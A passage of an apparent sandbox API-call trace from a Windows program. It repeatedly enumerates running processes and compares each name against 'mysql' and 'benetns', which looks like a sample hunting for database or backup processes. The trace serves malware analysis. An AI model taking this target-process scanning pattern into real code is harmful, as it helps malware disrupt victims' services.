lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581c40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.459] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.459] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.459] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0177.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.460] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581c88 [0177.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3581c88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.461] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0177.461] StrStrIA (lpFirst="dllhost.exe", lpSrch="mysql") returned 0x0 [0177.461] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0177.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.461] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581d00 [0177.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3581d00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0177.462] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0177.462] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mysql") returned 0x0 [0177.462] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0177.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.463] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3581da8 [0177.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3581da8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0177.463] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0177.463] StrStrIA (lpFirst="UsoClient.exe", lpSrch="mysql") returned 0x0 [0177.463] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0177.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0177.464] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3595d68 [0177.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3595d68, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0177.464] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0177.464] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="mysql") returned 0x0 [0177.464] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0177.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.465] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595da8 [0177.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3595da8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0177.465] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0177.465] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="mysql") returned 0x0 [0177.465] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.466] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581c28 [0177.466] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3581c28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.466] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.466] StrStrIA (lpFirst="conhost.exe", lpSrch="mysql") returned 0x0 [0177.466] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.472] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581dd8 [0177.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3581dd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.473] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.473] StrStrIA (lpFirst="conhost.exe", lpSrch="mysql") returned 0x0 [0177.473] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0177.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.474] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581dc0 [0177.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3581dc0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0177.474] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0177.474] StrStrIA (lpFirst="rxodge.exe", lpSrch="mysql") returned 0x0 [0177.474] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0177.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.475] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3581b20 [0177.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3581b20, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0177.475] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0177.475] StrStrIA (lpFirst="sppsvc.exe", lpSrch="mysql") returned 0x0 [0177.475] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0177.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.476] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3595ac8 [0177.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TrustedInstaller.exe", cchWideChar=-1, lpMultiByteStr=0x3595ac8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TrustedInstaller.exe", lpUsedDefaultChar=0x0) returned 21 [0177.477] lstrcpyA (in: lpString1=0x567fabc, lpString2="TrustedInstaller.exe" | out: lpString1="TrustedInstaller.exe") returned="TrustedInstaller.exe" [0177.477] StrStrIA (lpFirst="TrustedInstaller.exe", lpSrch="mysql") returned 0x0 [0177.477] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="TiWorker.exe")) returned 1 [0177.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.478] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581af0 [0177.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="TiWorker.exe", cchWideChar=-1, lpMultiByteStr=0x3581af0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TiWorker.exe", lpUsedDefaultChar=0x0) returned 13 [0177.478] lstrcpyA (in: lpString1=0x567fabc, lpString2="TiWorker.exe" | out: lpString1="TiWorker.exe") returned="TiWorker.exe" [0177.478] StrStrIA (lpFirst="TiWorker.exe", lpSrch="mysql") returned 0x0 [0177.478] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0177.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.479] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586ae0 [0177.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sc.exe", cchWideChar=-1, lpMultiByteStr=0x3586ae0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sc.exe", lpUsedDefaultChar=0x0) returned 7 [0177.479] lstrcpyA (in: lpString1=0x567fabc, lpString2="sc.exe" | out: lpString1="sc.exe") returned="sc.exe" [0177.479] StrStrIA (lpFirst="sc.exe", lpSrch="mysql") returned 0x0 [0177.479] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0177.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.480] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581b50 [0177.480] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WMIADAP.exe", cchWideChar=-1, lpMultiByteStr=0x3581b50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WMIADAP.exe", lpUsedDefaultChar=0x0) returned 12 [0177.480] lstrcpyA (in: lpString1=0x567fabc, lpString2="WMIADAP.exe" | out: lpString1="WMIADAP.exe") returned="WMIADAP.exe" [0177.480] StrStrIA (lpFirst="WMIADAP.exe", lpSrch="mysql") returned 0x0 [0177.481] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1158, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0177.481] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.482] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581b68 [0177.482] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3581b68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.482] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0177.482] StrStrIA (lpFirst="conhost.exe", lpSrch="mysql") returned 0x0 [0177.482] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.483] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581ca0 [0177.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3581ca0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0177.483] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0177.483] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0177.483] Process32NextW (in: hSnapshot=0x3b8, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0177.484] CloseHandle (hObject=0x3b8) returned 1 [0177.484] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x370 [0177.501] Process32FirstW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.503] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3595de8 [0177.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3595de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0177.503] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0177.503] StrStrIA (lpFirst="[System Process]", lpSrch="benetns") returned 0x0 [0177.503] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0177.504] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3586aa0 [0177.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3586aa0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0177.504] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0177.504] StrStrIA (lpFirst="System", lpSrch="benetns") returned 0x0 [0177.504] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.505] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3581b98 [0177.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3581b98, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0177.505] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0177.505] StrStrIA (lpFirst="smss.exe", lpSrch="benetns") returned 0x0 [0177.505] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.506] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581bc8 [0177.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3581bc8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0177.506] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0177.507] StrStrIA (lpFirst="csrss.exe", lpSrch="benetns") returned 0x0 [0177.507] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.508] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3581be0 [0177.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3581be0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0177.508] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0177.508] StrStrIA (lpFirst="wininit.exe", lpSrch="benetns") returned 0x0 [0177.508] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0177.543] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3581bf8 [0177.543] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3581bf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0177.543] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0177.543] StrStrIA (lpFirst="csrss.exe", lpSrch="benetns") returned 0x0 [0177.543] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.544] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0177.545] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3581e38 [0177.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3581e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0177.545] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0177.545] StrStrIA (lpFirst="winlogon.exe", lpSrch="benetns") returned 0x0 [0177.545] Process32NextW (in: hSnapshot=0x370, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.546] WideCharToMultiByte 